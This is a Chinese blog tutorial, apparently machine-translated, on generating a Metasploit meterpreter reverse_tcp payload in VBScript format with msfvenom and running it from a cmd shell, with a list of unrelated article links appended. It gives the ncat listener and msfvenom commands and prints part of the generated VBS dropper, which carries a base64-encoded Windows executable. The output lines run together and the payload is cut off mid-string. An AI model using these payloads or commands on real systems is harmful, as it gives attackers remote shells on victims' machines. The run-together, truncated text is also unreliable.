当前位置: 首页 > ai >正文

在 cmd shell 中执行 metasploit vbs payload

在 cmd shell 中执行 metasploit vbs payload

如果你是一个渗透测试者/研究人员,你可能希望有时从 cmd shell 获得一个 meterpreter 会话,例如:(sqlmap --os-shell 或其他工具)。前任:

$ ncat -l -p 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.  C:\Documents and Settings\test\Desktop>ver
ver  Microsoft Windows XP [Version 5.1.2600]
C:\Documents and Settings\test\Desktop>

在前面,您需要尝试以下方法:

  • A. 将 exe 转换为批处理脚本。
  • b. 从远程服务器下载负载文件(FTP、TFTP、HTTP 等)。
  • c. …

现在,我将向你展示如何在 cmd.exe中运行 metasploit payload。请尝试思考以下问题:

  1. 如何使用 msfvenom 生成有效负载?
  2. 如何以简单/兼容的方式运行 payload ?

如何使用 msfvenom 生成有效负载?

为了在 Windows XP/2003 上测试有效负载,我们选择 vbs 格式 .如果您需要帮助,请尝试 [msfvenom -h]

$ msfvenom -p windows/meterpreter/reverse_tcpLHOST=192.168.1.100 LPORT=4444 -f vbs --arch x86 --platform winNo encoder or badchars specified, outputting raw payloadPayload size: 333 bytesFinal size of vbs file: 7370 bytesFunction oSpLpsWeU(XwXDDtdR)urGQiYVn = "" & _           XwXDDtdR & ""      Set gFMdOBBiLZ = CreateObject("MSXML2.DOMDocument.3.0")gFMdOBBiLZ.LoadXML(urGQiYVn)oSpLpsWeU = gFMdOBBiLZ.selectsinglenode("B64DECODE").nodeTypedValueset gFMdOBBiLZ = nothingEnd FunctionFunction skbfzWOqR()cTENSbYbnWY = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAMC7z0MAAAAAAAAAAOAADwMLAQI4AAIAAAAOAAAAAAAAABAAAAAQAAAAIAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAABAAAAAAgAARjoAAAIAAAAAACAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAAAwAABkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAKAAAAAAQAAAAAgAAAAIAAAAAAAAAAAAAAAAAACAAMGAuZGF0YQAAAJAKAAAAIAAAAAwAAAAEAAAAAAAAAAAAAAAAAAAgADDgLmlkYXRhAABkAAAAADAAAAACAAAAEAAAAAAAAAAAAAAAAAAAQAAwwAAAAAAAAAAAAAAAAAAAAAC4ACBAAP/gkP8lODBAAJCQAAAAAAAAAAD/AAAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
http://www.xdnf.cn/news/2727.html

相关文章:

  • OpenAvatarChat要解决UnicodeDecodeError
  • 一文掌握Matplotlib绘图
  • PyQt6基础_QThread
  • 亚马逊如何分析竞品
  • 网工笔记-网络层
  • 软件工程(一):黑盒测试与白盒测试
  • 【浙江大学DeepSeek公开课】人类经验与AI算法的镜像之旅
  • 考研系列-计算机组成原理第七章、输入/输出系统
  • 解锁健康密码:养生的多维智慧
  • 【手册】Linux服务器应急排查实战指南
  • 《Learning Langchain》阅读笔记11-RAG(7)索引优化:RAPTOR方法和ColBERT方法
  • C++:BST、AVL、红黑树
  • 惠普P1108打印机信息
  • gre over ipsec (神州数码)
  • 巧记英语四级单词 Unit6-中【晓艳老师版】
  • SpringBoot启动后自动执行方法的各种方式-笔记
  • 【MCP】第三篇:Cline工具链路追踪——解码“协议引擎“的神经传导奥秘
  • Pytest-mark使用详解(跳过、标记、参数 化)
  • 夜莺 v8.0.0-beta.10 部署
  • 新能源汽车声纹监测技术的发展趋势是什么?
  • 机器学习:【抛掷硬币的贝叶斯后验概率】
  • 【MySQL】-- 增删改查操作(1)
  • AI辅助编程-cursor开发煤矿持证上岗管理程序需求与设计篇
  • python tk.text不可编辑
  • 高效运维,智慧监测:COMEM光纤温度测量系统在电力行业中的应用
  • 云服务器被黑客攻击应急响应与加固指南(上)
  • Shiro学习(七):总结Shiro 与Redis 整合过程中的2个问题及解决方案
  • 网络安全入门综述
  • 深入了解指针(6)
  • day004-习题